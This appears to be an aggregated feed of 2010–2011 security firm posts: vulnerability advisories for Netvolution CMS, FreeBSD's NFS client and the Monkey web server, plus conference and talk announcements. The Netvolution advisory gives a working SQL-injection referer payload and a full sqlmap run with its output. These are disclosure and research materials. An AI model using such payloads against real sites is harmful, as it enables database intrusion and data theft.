Exploited by Dimitris Glynos Netvolution v258 is vulnerable to a blind SQL injection attack in the HTTP referer header A malicious user may utilize this vulnerability to modify content on the vulnerable website, inject malicious javascript code to a visitor s browser, collect CMS usernames and plaintext passwords and, in some cases, execute commands on the system hosting the database server This is a critical vulnerability since it does not require authentication and its exploitation may go undetected Details Netvolution is a commercial content management system by ATCOM SA with a large number of installations, most of them belonging to Greek companies and organizations It appears that the Netvolution platform has both ASP and PHP implementations This advisory concerns a bug found in the ASP implementation version 258 We were unable to verify with the vendor if this bug also affects other versions of the ASP or PHP codebase The bug is located in the code that parses the HTTP Referer header value An attacker may inject arbitrary SQL commands to the Netvolution database by using a Referer header like the following Referer 1','0' SQL In the above example SQL is a placeholder the attacker would replace this with the SQL commands to be executed by the database The CMS does not provide feedback on the output of the SQL commands but collection of this output is still possible through blind SQL Injection techniques The following Proof of Concept, shows sqlmap mounting a blind SQL injection attack on a vulnerable website and retrieving the database banner user host sqlmap sqlmappy -u 'http sitecom defaultasp pid 45 la 1 nid 100 ny 2011' -p referer --referer 1','0' -b sqlmap 10-dev r4379 automatic SQL injection and database takeover tool http wwwsqlmaporg legal disclaimer usage of sqlmap for attacking targets without prior mutual consent is illegal It is the end user's responsibility to obey all applicable local, state and federal laws Authors assume no liability and are not responsible for any misuse or damage caused by this program starting at 11 01 55 11 01 56 WARNING the testable parameter 'referer' you provided is not inside the GET 11 01 56 INFO using ' home user sqlmap output sitecom session' as session file 11 01 56 INFO testing connection to the target url 11 01 57 WARNING there is a DBMS error found in the HTTP response bodywhich could interfere with the results of the tests 11 01 57 WARNING the testable parameter 'referer' you provided is not inside the Cookie 11 01 57 INFO testing if the url is stable, wait a few seconds 11 01 59 INFO url is stable 11 01 59 INFO testing if Referer parameter 'Referer' is dynamic 11 01 59 WARNING Referer parameter 'Referer' appears to be not dynamic 11 02 00 INFO heuristic test shows that Referer parameter 'Referer' might be injectable possible DBMS Microsoft SQL Server 11 02 00 INFO testing sql injection on Referer parameter 'Referer' 11 02 00 INFO testing 'AND boolean-based blind WHERE or HAVING clause' parsed error message s showed that the back-end DBMS could be Microsoft SQL Server Do you want to skip test payloads specific for other DBMSes Y n Y 11 02 16 INFO testing 'Microsoft SQL Server Sybase AND error-based WHERE or HAVING clause' 11 02 19 INFO testing 'Microsoft SQL Server Sybase stacked queries' 11 02 31 INFO Referer parameter 'Referer' is 'Microsoft SQL Server Sybase stacked queries' injectable 11 02 31 INFO testing 'Microsoft SQL Server Sybase time-based blind' 11 02 43 INFO Referer parameter 'Referer' is 'Microsoft SQL Server Sybase time-based blind' injectable 11 02 43 INFO testing 'Generic UNION query NULL 1 to 10 columns' Referer parameter 'Referer' is vulnerable Do you want to keep testing the others y N N sqlmap identified the following injection points with a total of 33 HTTP s requests --- Place Referer Parameter Referer Type stacked queries Title Microsoft SQL Server Sybase stacked queries Payload 1','0' WAITFOR DELAY '0 0 5' -- Type AND OR time-based blind Title Microsoft SQL Server Sybase time-based blind Payload 1','0' WAITFOR DELAY '0 0 5'-- --- 11 02 58 INFO testing Microsoft SQL Server 11 02 59 WARNING it is very important not to stress the network adapter's bandwidth during usage of time-based queries 11 03 04 INFO confirming Microsoft SQL Server do you want to adjust the time delay to 3 seconds due to good response times Y n Y 11 03 41 INFO the back-end DBMS is Microsoft SQL Server 11 03 41 INFO fetching banner web server operating system Windows 2003 web application technology ASPNET, Microsoft IIS 60, ASP back-end DBMS operating system Windows 2003 Service Pack 2 back-end DBMS Microsoft SQL Server 2005 banner --- Microsoft SQL Server 2005 900505700 Intel X86 Mar 25 2011 13 50 04 Copyright c 1988-2005 Microsoft Corporation Standard Edition on Windows NT 52 Build 3790 Service Pack 2 --- 11 58 52 WARNING HTTP error codes detected during testing 500 Internal Server Error 21 times 11 58 52 INFO Fetched data logged to text files under ' home user sqlmap output sitecom' shutting down at 11 58 52 Although Netvolution has been found to be vulnerable to numerous injection attacks in the past 1, 2, 3 this particular bug is especially interesting as it manifests itself in a HTTP header field As header field values are normally not included in HTTP transaction logs, an attack based on this vulnerability may go unnoticed by web server administrators We have repeatedly contacted the software vendor about this issue but we have not received a reply Administrators of Netvolution websites must check with the software vendor to ensure that they are running a non-vulnerable version of the CMS Disclosure Timeline CVE assignment August 30th, 2011 Vendor Contact s August 31st, 2011 September 1st, 2011 September 27th, 2011 Public Disclosure October 3rd, 2011 http://www.secuobs.com/revue/news/332279.shtmlhttp://www.secuobs.com/revue/news/332279.shtml Secuobs.com : 2011-07-22 12:04:26 - www.census labs.com - My presentation slides from this year s FOSSCOMM security sessions are now also available here The talk, entitled Performing Digital Forensics with Open Source tools , described the phases of the digital forensics investigation process and showed how these could be carried out with the aid of open source tools The Q A with students, administrators and security engineers in the audience led to a very interesting discussion on best practices for incident response IMAGE All in all the presentation was a great success and I would like to thank both the organizers and the audience for making this such a wonderful event Presentation Material Presentation Slides pdf http://www.secuobs.com/revue/news/318679.shtmlhttp://www.secuobs.com/revue/news/318679.shtml Secuobs.com : 2011-07-22 11:14:46 - www.census labs.com - census has participated once again at AthCon, the leading technical IT security conference in Greece Our work entitled Introducing the Parasite presented a small device that is capable of creating a physical backdoor in an otherwise protected network The talk focused on how to build such a device from off-the-shelf components and how its use changes the Security Testing paradigm, bringing benefits to both the customer and penetration tester Our talk also included tips regarding the deployment of such devices in different scenarios and suggested ways in which the availability of the backdoor tunnel could be improved Below you may find the presentation slides Presentation slides pdf http://www.secuobs.com/revue/news/318675.shtmlhttp://www.secuobs.com/revue/news/318675.shtml Secuobs.com : 2011-05-26 10:46:51 - www.census labs.com - census is happy to be participating for the second time at AthCon, the leading technical IT security conference in Greece At this year s conference, our researcher Nikos Tsagkarakis will be presenting the Parasite , a small device that is capable of creating a physical backdoor in an otherwise protected network IMAGE In his talk, Nikos will be showing how portable devices such as the Parasite can change the security testing paradigm and push for better security policies in organizations You don t want to miss out on this, so register today http://www.secuobs.com/revue/news/307270.shtmlhttp://www.secuobs.com/revue/news/307270.shtml Secuobs.com : 2011-05-17 23:20:09 - www.census labs.com - census will be participating at the ELLAK 2011 conference panel on Doing business with Open Source Software This session will take place on May 21st 2011 at 15 30, at the Ceremony Hall of the National Technological University of Athens IMAGE http://www.secuobs.com/revue/news/305465.shtmlhttp://www.secuobs.com/revue/news/305465.shtml Secuobs.com : 2011-05-17 22:29:36 - www.census labs.com - census is proud to have participated in FOSSCOMM 2011, the annual hellenic conference that brings together Free OSS communities and developers for a 2-day marathon of talks, workshops and technical discussions IMAGE This year s FOSSCOMM took place on May 7th and 8th at the University of Patras census participated with two presentations Our first talk, given by Dimitris Glynos was called Performing Digital Forensics with Open Source tools The talk presented the basic steps of a digital forensics investigation process and illustrated how these could be carried out with the aid of open source tools Our security researchers Patroklos Argyroudis and Chariton Karamitas followed with the Patras Heap Massacre presentation, a study of heap management and exploitation strategies for both kernel and userland applications We would like to congratulate the organizers of FOSSCOMM and the University of Patras for hosting this great event We would also like to thank everyone that attended we re looking forward to seeing you at next year s conference http://www.secuobs.com/revue/news/305455.shtmlhttp://www.secuobs.com/revue/news/305455.shtml Secuobs.com : 2011-04-26 15:30:16 - www.census labs.com - census researchers Patroklos Argyroudis and Dimitris Glynos will be presenting their Blackhat EU 2011 paper entitled Protecting the Core Kernel Exploitation Mitigations at the upcoming OWASP Greek Chapter meeting in Athens IMAGE The event will take place on May 5th, 2011 19 30 at room A2 of the Dept of Informatics Telecommunications, University of Athens Due to limited seating a free online RSVP is required More information about our Protecting the Core paper can be found here We would like to thank both the OWASP Greek Chapter and the University of Athens for organizing and hosting this event We hope to see you there http://www.secuobs.com/revue/news/300822.shtmlhttp://www.secuobs.com/revue/news/300822.shtml Secuobs.com : 2011-03-22 16:13:27 - www.census labs.com - Black Hat Europe 2011 is now over and we are very happy to have participated once again in the best European IT security conference Continuing from our last year s presentation, our talk this year focused on operating system kernel protections Specifically, our researchers Patroklos Argyroudis and Dimitris Glynos collected their experiences from kernel exploit development and presented the ways in which modern operating systems protect their kernels from memory corruption attacks IMAGE The first part of our talk touched on the importance of kernel security Operating system kernel security has become very important lately, mainly for two reasons The first one is that in userland most generic exploitation approaches have been defeated by countermeasure technologies This means that it is becoming increasingly harder to successfully penetrate target systems through memory corruption bugs in applications and therefore penetration testers and security researchers have started looking more at kernel vulnerabilities The second reason for the importance of kernel security is that operating system kernels are large and complex code bases, increasing the possibility of security-related bugs This has led to the wide adoption of proactive kernel defense mechanisms The second part of our talk gave an overview of kernel vulnerability classes and programming bugs that lead to such vulnerabilities In order to allow the attendants to compare userland mitigations to kernel ones, the third part of the talk briefly presented the currently available userland exploitation defenses The fourth and main part of our talk presented a detailed technical analysis of the kernel exploitation mitigations found on Linux version 2637 , Windows 7, Mac OS X Snow Leopard version 1066 and FreeBSD version 81 Our talk also covered the kernel defenses available on popular mobile phone platforms, such as Apple s iOS the iPhone operating system and Google s Android As an example success story of a kernel exploitation mitigation one may consider the MS10-009 CVE-2010-0239 ICMPv6 router advertisement vulnerability This is a Windows 7 remote code execution vulnerability due to unbounded memory copying when processing ICMPv6 router advertisement packets When the vulnerability is triggered, the Windows 7 kernel detects the corrupted kernel stack and the operating system halts This is indeed preferable to the alternative which is remote code execution and subsequent full compromise of the system IMAGE Where possible, the fourth part of our talk also presented the available techniques for bypassing some of the examined mitigation technologies, along with the appropriate references to enable all interested parties to get a head start in this area of research The fifth and final part of our presentation provided generic hints and tips on bypassing proactive kernel defense mechanisms Presentation Material All material from our presentation are provided below in the hope that they will be useful to security researchers, developers and users of the above operating systems Slides bheu-2011-slidespdf White paper bheu-2011-wppdf Acknowledgements We would like to thank Matt Miller and Maarten Van Horenbeeck of Microsoft for providing us with helpful comments regarding Windows 7 Legal Notice Linux is a registered trademark of Linus Torvalds Microsoft, Windows 7 and the Windows logo are registered trademarks of Microsoft Corporation Mac OS X Snow Leopard, iPhone and the Apple logo are registered trademarks of Apple Inc FreeBSD and the FreeBSD logo are registered trademarks of The FreeBSD Foundation Android is a trademark of Google Inc Finally, the Android Robot logo is reproduced from work created and shared by Google and used according to terms described in the Creative Commons 30 Attribution License http://www.secuobs.com/revue/news/293319.shtmlhttp://www.secuobs.com/revue/news/293319.shtml Secuobs.com : 2011-02-11 11:32:40 - www.census labs.com - IMAGE census researchers will be presenting Protecting the Core , an analysis of kernel exploitation mitigations at Black Hat Europe 2011 Once again this year, the European Black Hat Briefings conference will be held in Barcelona, Spain We hope to see you there http://www.secuobs.com/revue/news/284582.shtmlhttp://www.secuobs.com/revue/news/284582.shtml Secuobs.com : 2010-06-30 00:54:04 - www.census labs.com - IMAGE A new whitepaper on Vulnerability Research has been added to the Services section of our website It features an introduction to our top-down research methodology and presents the key benefits of the census Vulnerability Research service http://www.secuobs.com/revue/news/236294.shtmlhttp://www.secuobs.com/revue/news/236294.shtml Secuobs.com : 2010-06-29 18:29:33 - www.census labs.com - IMAGE A new whitepaper on Security Testing has been added to the Services section of our website It features an introduction to the aggressive security testing with Tiger Team, Penetration Testing and presents the key benefits of the census Security Testing services http://www.secuobs.com/revue/news/236163.shtmlhttp://www.secuobs.com/revue/news/236163.shtml Secuobs.com : 2010-06-05 04:58:42 - www.census labs.com - AthCon 2010 is now over and I must say that I m really looking forward to next year s event Kudos to Christian, Kyprianos, Fotis, Chariton, Bernardo, Sandro, Iftach, Corrado, Rodrigo, Alberto and everyone else for making this such a great event The main theme of my presentation was Context-keyed payload encoding , a shellcode encoding technique that allows attackers to evade detection from NIDS that employ dynamic payload analysis The presentation covered the state-of-the-art in NIDS and Context-keying and featured Metasploit implementations for a CPUID-based context-keyed payload encoder a time 2 -based context-keyed payload encoder a novel stat 2 -based context-keyed payload encoder Below you may find the relevant whitepaper, presentation slides and Metasploit patch Presentation whitepaper pdf Presentation slides pdf Metasploit patch diff A usage example of the new payload encoders can be found in the whitepaper All three encoders and their associated auxiliary tools have been submitted to the Metasploit Framework for review I will be updating this space with news on this, as they come along, so stay tuned http://www.secuobs.com/revue/news/228829.shtmlhttp://www.secuobs.com/revue/news/228829.shtml Secuobs.com : 2010-05-27 13:05:38 - www.census labs.com - census ID census-2010-0001 CVE ID CVE-2010-2020 Affected Products FreeBSD 80-RELEASE, 73-RELEASE, 72-RELEASE Class Improper Input Validation CWE-20 Remote No Discovered by Patroklos Argyroudis We have discovered two improper input validation vulnerabilities in the FreeBSD kernel s NFS client-side implementation FreeBSD 80-RELEASE, 73-RELEASE and 72-RELEASE that allow local unprivileged users to escalate their privileges, or to crash the system by performing a denial of service attack Details FreeBSD is an advanced operating system which focuses on reliability and performance More information about its features can be found here FreeBSD 80-RELEASE, 73-RELEASE and 72-RELEASE employ an improper input validation method in the kernel s NFS client-side implementation Specifically, the first vulnerability is in function nfs_mount file src sys nfsclient nfs_vfsopsc which is reachable from the mount 2 and nmount 2 system calls In order for them to be enabled for unprivileged users the sysctl 8 variable vfsusermount must be set to a non-zero value The function nfs_mount employs an insufficient input validation method for copying data passed in a structure of type nfs_args from userspace to kernel Specifically, the file handle buffer to be mounted argsfh and its size argsfhsize are completely user-controllable The unbounded copy operation is in file src sys nfsclient nfs_vfsopsc the excerpts are from 80-RELEASE 1094 if has_fh_opt 1095 error copyin caddr_t argsfh, caddr_t nfh, 1096 argsfhsize 1097 if error 1098 goto out 1099 The declaration of the variables args and nfh is at 786 static int 787 nfs_mount struct mount mp 788 789 struct nfs_args args 790 version NFS_ARGSVERSION, 791 addr NULL, 792 addrlen sizeof struct sockaddr_in , 793 sotype SOCK_STREAM, 794 proto 0, 795 fh NULL, 796 fhsize 0, 797 flags NFSMNT_RESVPORT, 798 wsize NFS_WSIZE, 799 rsize NFS_RSIZE, 800 readdirsize NFS_READDIRSIZE, 801 timeo 10, 802 retrans NFS_RETRANS, 803 maxgrouplist NFS_MAXGRPS, 804 readahead NFS_DEFRAHEAD, 805 wcommitsize 0, was NQ_DEFLEASE 806 deadthresh NFS_MAXDEADTHRESH, was NQ_DEADTHRESH 807 hostname NULL, 808 args version 4 809 acregmin NFS_MINATTRTIMO, 810 acregmax NFS_MAXATTRTIMO, 811 acdirmin NFS_MINDIRATTRTIMO, 812 acdirmax NFS_MAXDIRATTRTIMO, 813 814 int error, ret, has_nfs_args_opt 815 int has_addr_opt, has_fh_opt, has_hostname_opt 816 struct sockaddr nam 817 struct vnode vp 818 char hst MNAMELEN 819 size_t len 820 u_char nfh NFSX_V3FHMAX This vulnerability can cause a kernel stack overflow which leads to privilege escalation on FreeBSD 73-RELEASE and 72-RELEASE On FreeBSD 80-RELEASE the result is a kernel crash denial of service due to the SSP ProPolice kernel stack-smashing protection which is enabled by default Versions 71-RELEASE and earlier do not appear to be vulnerable since the bug was introduced in 72-RELEASE The second vulnerability exists in the function mountnfs that is called from function nfs_mount 1119 error mountnfs args, mp, nam, argshostname, vp, 1120 curthread-td_ucred The function mountnfs is reachable from the mount 2 and nmount 2 system calls by unprivileged users As with the nfs_mount case above, this requires the sysctl 8 variable vfsusermount to be set to a non-zero value The file handle to be mounted argp-fh and its size argp-fhsize are passed to function mountnfs from function nfs_mount and are user-controllable These are subsequently used in an unbounded bcopy call file src sys nfsclient nfs_vfsopsc 1219 bcopy caddr_t argp-fh, caddr_t nmp-nm_fh, argp-fhsize The above can cause a kernel heap overflow when argp-fh is bigger than 128 bytes the size of nmp-nm_fh since nmp is an allocated item on the Universal Memory Allocator UMA, the FreeBSD kernel s heap allocator zone nfsmount_zone again from src sys nfsclient nfs_vfsopsc 1160 static int 1161 mountnfs struct nfs_args argp, struct mount mp, struct sockaddr nam, 1162 char hst, struct vnode vpp, struct ucred cred 1163 1164 struct nfsmount nmp 1165 struct nfsnode np 1166 int error 1167 struct vattr attrs 1168 1169 if mp-mnt_flag MNT_UPDATE 1170 nmp VFSTONFS mp 1171 printf pourcentss MNT_UPDATE is no longer handled here n , __func__ 1172 free nam, M_SONAME 1173 return 0 1174 else 1175 nmp uma_zalloc nfsmount_zone, M_WAITOK This kernel heap overflow can lead on FreeBSD 80-RELEASE, 73-RELEASE and 72-RELEASE to privilege escalation and or a kernel crash denial of service attack Similarly to the first vulnerability, FreeBSD 71-RELEASE and earlier versions do not appear to be vulnerable FreeBSD has released an official advisory and a patch to address both vulnerabilities All affected parties are advised to follow the upgrade instructions included in the advisory and patch their systems http://www.secuobs.com/revue/news/226234.shtmlhttp://www.secuobs.com/revue/news/226234.shtml Secuobs.com : 2010-05-10 18:37:55 - www.census labs.com - IMAGE census will be joining forces with Online Systems Ltd to offer specialised IT security services in the United Kingdom, under a new brand name More details on this will follow soon http://www.secuobs.com/revue/news/220586.shtmlhttp://www.secuobs.com/revue/news/220586.shtml Secuobs.com : 2010-05-10 16:28:39 - www.census labs.com - IMAGE A new whitepaper on Digital Forensics has been added to the Services section of our website It features a gentle introduction to the field of digital investigations and presents the key benefits of the census Digital Forensics service http://www.secuobs.com/revue/news/220551.shtmlhttp://www.secuobs.com/revue/news/220551.shtml Secuobs.com : 2010-05-09 23:02:40 - www.census labs.com - IMAGE census will be presenting Context-keyed Payload Encoding Fighting the Next Generation of IDS at AthCon 2010 AthCon is a fresh IT security conference which will take place this summer in Greece Our presentation will cover the latest in IDS evasion techniques for targeted shellcode and will feature new Metasploit modules implementing the presented techniques you don t want to miss out on this, so register now http://www.secuobs.com/revue/news/220378.shtmlhttp://www.secuobs.com/revue/news/220378.shtml Secuobs.com : 2010-04-26 10:36:47 - www.census labs.com - In my recent Black Hat Europe 2010 talk I gave an overview of the kernel exploitation prevention mechanisms that exist on FreeBSD A few people at the conference have subsequently asked me to elaborate on the subject In this post I will collect all the information from my talk and the various discussions I had in the Black Hat conference hallways Userland memory corruption protections also known as exploitation mitigations have made most of the generic exploitation approaches obsolete This is true both on Windows and Unix-like operating systems In order to successfully achieve arbitrary code execution from a vulnerable application nowadays a researcher needs to look to the memory layout and the code structure of the particular application On the other hand, exploitation mitigation mechanisms for kernel code have not seen the same level of adoption mostly due to the performance penalty they introduce This has increased the interest in viewing the operating system kernel as part of the attack surface targeted in a penetration test Therefore, many operating systems have started to introduce kernel exploitation mitigations The recent CanSecWest talk by Tavis Ormandy and Julien Tinnes titled There s a party at Ring0, and you re invited presented an overview of such mitigations on Windows and Linux FreeBSD also has a number of memory corruption protections for kernel code Not all of these were developed with the goal of undermining attacks, but primarily as debugging mechanisms Some are enabled by default in the latest stable version 80-RELEASE and some are not Stack-smashing Kernel stack-smashing protection for FreeBSD was introduced in version 80 via ProPolice SSP Specifically, the file src sys kern stack_protectorc is compiled with gcc s -fstack-protector option and registers an event handler called __stack_chk_init that generates a random canary value the guard variable in SSP terminology placed between the local variables and the saved frame pointer of a kernel process s stack during a function s prologue Below is the relevant part of the stack_protectorc file 10 __stack_chk_guard 8 20 define __arraycount x sizeof x sizeof x 0 21 static void 22 __stack_chk_init void dummy __unused 23 24 size_t i 25 long guard arraycount stack_chk_guard 26 27 arc4rand guard, sizeof guard , 0 28 for i 0 i __arraycount guard i 29 __stack_chk_guard i guard i 30 When the protected function exits, the canary is checked against its original value If it has been altered the kernel calls panic 9 bringing down the whole system, but also stopping any execution flow redirection caused by manipulation of the function s saved frame pointer or saved return address again from the stack_protectorc file 13 void 14 __stack_chk_fail void 15 16 17 panic stack overflow detected backtrace may be corrupted 18 ProPolice SSP also performs local variable and pointer reordering in order to protect against the corruption of variables and pointers due to stack buffer overflow vulnerabilities NULL page mappings Also in version 80, FreeBSD has introduced a protection against user mappings at address 0 NULL This exploitation mitigation mechanism is exposed through the sysctl 8 variable securitybsdmap_at_zero and is enabled by default ie the variable has the value 0 When a user request is made for the NULL page and the feature is enabled, the kernel instead of returning address 0 it returns address 0x1000 Obviously this protection is ineffective in vulnerabilities which the attacker can directly or indirectly control the kernel dereference offset For an applicable example see the exploit for vulnerability CVE-2008-3531 I have previously published Heap-smashing FreeBSD has introduced kernel heap-smashing detection in 80-RELEASE via an implementation called RedZone RedZone is oriented more towards debugging the kernel memory allocator rather than detecting and stopping deliberate attacks against it If enabled it is disabled by default RedZone places a static canary value of 16 bytes above and below each buffer allocated on the heap The canary value consists of the hexadecimal value 0x42 repeated in these 16 bytes During a heap buffer's deallocation the canary value is checked and if it has been corrupted the details of the corruption address of the offending buffer and stack traces of the buffer's allocation and deallocation are logged The code that performs the check for a heap overflow is the following from file src sys vm redzonec 166 ncorruptions 0 167 for i 0 i REDZONE_CFSIZE i , faddr 168 if u_char faddr 0x42 169 ncorruptions 170 This protection mechanism can obviously be easily bypassed Use-after-free MemGuard is a replacement kernel memory allocator introduced in FreeBSD version 60 and is designed to detect use-after-free bugs in kernel code Similarly to RedZone, MemGuard mainly targets debugging scenarios and does not constitute a mechanism to mitigate deliberate attacks However, MemGuard is not compatible and cannot replace the Universal Memory Allocator's UMA which is the default kernel allocator in FreeBSD calls Therefore and also due to the overhead it introduced even before UMA was developed , it is not enabled by default http://www.secuobs.com/revue/news/215966.shtmlhttp://www.secuobs.com/revue/news/215966.shtml Secuobs.com : 2010-04-22 08:50:06 - www.census labs.com - census participated in the free open source event held last month Friday 23rd of October at the Hellenic Air Force Academy Σχολή Ικάρων IMAGE Our talk presented an overview of the available free open source software that can be used to build complete security solutions for public offices and infrastructure Furthermore, we analysed recorded cyberwarfare incidents and how the open source model can aid in establishing robust defenses The slides from our presentation are available here in Greek We would like to cordially thank Professor Antonios Andreatos for inviting us to the event and for his organisational efforts http://www.secuobs.com/revue/news/214831.shtmlhttp://www.secuobs.com/revue/news/214831.shtml Secuobs.com : 2010-04-22 08:50:06 - www.census labs.com - census ID census-2009-0004 Affected Products Monkey web server versions 092 Class Improper Input Validation CWE-20 , Incorrect Calculation CWE-682 Remote Yes Discovered by Patroklos Argyroudis We have discovered a remotely exploitable improper input validation vulnerability in the Monkey web server that allows an attacker to perform denial of service attacks by repeatedly crashing worker threads that process HTTP requests Details Monkey is a fast, efficient, small and easy to configure HTTP 11 compliant web server It has been designed to be scalable with low memory and CPU consumption More information about its features can be found here Monkey up to and including version 092 employs an insufficient input validation method for handling HTTP requests with invalid connection headers Specifically, the vulnerability is in the calculation for the end of the request body buffer related to newline characters in function Request_Find_Variable in the file src requestc 364 char Request_Find_Variable char request_body, char string 365 366 int pos_init_var 0, pos_end_var 0 367 char var_value 0 368 369 Existe string en request_body 370 if strstr2 request_body, string NULL 371 return NULL 372 373 pos_init_var str_search request_body, string, strlen string 374 pos_end_var str_search request_body pos_init_var, n , 1 1 375 376 if pos_init_varstrlen string pos_init pos_end 438 return NULL 439 This causes Request_Find_Variable to return NULL line 344, file src requestc and this to be used in the strstr2 call at line 345 of file src requestc 344 sr-connection Request_Find_Variable request_body, RH_CONNECTION 345 if strstr2 sr-connection, Keep-Alive NULL 346 sr-keep_alive VAR_ON 347 This vulnerability can allow an attacker to perform denial of service attacks by repeatedly crashing Monkey worker threads that process HTTP requests We have developed a proof-of-concept exploit to demonstrate the vulnerability The maintainer of Monkey has been contacted and a new version of the web server 093 has been released that addresses this issue All affected parties are advised to upgrade to the latest version available http://www.secuobs.com/revue/news/214830.shtmlhttp://www.secuobs.com/revue/news/214830.shtml Secuobs.com : 2010-04-22 08:50:06 - www.census labs.com - census will be presenting Binding the Daemon , an in-depth analysis of FreeBSD kernel stack and kernel heap exploitation methodologies at Black Hat Europe 2010 This year the European Black Hat Briefings conference will be held in Barcelona, Spain We hope to see you there http://www.secuobs.com/revue/news/214829.shtmlhttp://www.secuobs.com/revue/news/214829.shtml Secuobs.com : 2010-04-22 08:50:06 - www.census labs.com - This article is a followup to our last year s advisory on canary randomisation for applications of the Debian distribution I was recently asked what the currently employed method is for canary randomisation in SSP-armoured Linux applications I ve been meaning to write an article on this for some time now, but didn t have the necessary time So here it is albeit a little late To recap our previous article on the subject, Debian GNU Linux used to build the GNU libc packages without the enable-stackguard-randomization flag This meant that all SSP-armoured applications got a static ie predictable canary Our suggestion at the time was to add the enable-stackguard-randomization flag to the Debian glibc build-time options Unfortunately, this solution incurred a significant penalty in system performance, since all applications even the ones not using SSP had to open dev urandom to get their random canary bytes Kees Cook of canonicalcom had been pushing for a kernel-based solution to this problem since late 2008 1 What Kees and others saw as an efficient alternative was to initialise the canary with data coming from a kernel-supplied array of random bytes The proposed array, called AT_RANDOM, would be part of the ELF Auxiliary Vector and could also be of use to other applications, requiring fast access to small amounts of random data For our non-ELF-expert readers, I should note that the ELF Auxiliary Vector is a mechanism for passing system information eg memory page size, executable name etc to an application The ELF Auxiliary Vector resides within the application stack actually, right after the array hosting the environmental variables The AT_RANDOM array was indeed added to the Linux kernel in January 8th, 2009 2 Three days later, GNU libc received the appropriate patch so that the canary value would be initialised to the first word of random data found in the AT_RANDOM array 3 Regarding SSP, everything else continued working exactly in the same way The SSP ABI for the x86 architecture instructs that the compiler will find the random canary value at pourcentsgs 0x14 So, in dynamically linked executables, the dynamic loader will initialise pourcentsgs 0x14 with the first word of the AT_RANDOM array, while the same operation will be performed by __libc_start_main in statically linked executables GNU libc uses the __ASSUME_AT_RANDOM symbol to identify platforms that support the AT_RANDOM array of random bytes At the time of this writing, this only holds true for Linux On other platforms one will still have to use the enable-stackguard-randomization flag to get a random canary through dev urandom You can find out if your system supports the AT_RANDOM canary initialisation method by searching for the AT_RANDOM array reference like this LD_SHOW_AUXV 1 bin true grep AT_RANDOM AT_RANDOM 0xbfd6b1bb http://www.secuobs.com/revue/news/214828.shtmlhttp://www.secuobs.com/revue/news/214828.shtml Secuobs.com : 2010-04-22 08:50:06 - www.census labs.com - Black Hat Europe 2010 is now over and after a brief ash cloud caused delay I am back in Greece It has been a great conference, flawlessly organised and with many outstanding presentations I would like to thank everyone that attended my presentation but also all the kind people that spoke to me before and afterwards I hope to meet all of you again at a future event IMAGE My presentation, titled Binding the Daemon FreeBSD Kernel Stack and Heap Exploitation , was divided into four parts In the first part I gave an overview of the published work on the subject of kernel exploitation for Unix-like operating systems The second and third parts were the main body of the presentation Specifically, in the second part I explained how a kernel stack overflow vulnerability on FreeBSD can be leveraged to achieve arbitrary code execution The third part focused on a detailed security analysis of the Universal Memory Allocator UMA , the FreeBSD kernel s memory allocator I explored how UMA overflows can lead to arbitrary code execution in the context of the latest stable FreeBSD kernel 80-RELEASE , and I developed an exploitation methodology for privilege escalation and kernel continuation In the fourth and final part I gave a demo of a FreeBSD kernel local 0day vulnerability that I have discovered However, I have not released the details of the vulnerability in my Black Hat presentation The details of this vulnerability plus the proof-of-concept exploit will be released shortly, once the relevant code is patched and the official advisory is out Below you may find all the material of my presentation, updated with some extra information and minor corrections Slides bheu-2010-slidespdf White paper bheu-2010-wppdf Source code bheu-2010-srctargz http://www.secuobs.com/revue/news/214827.shtmlhttp://www.secuobs.com/revue/news/214827.shtml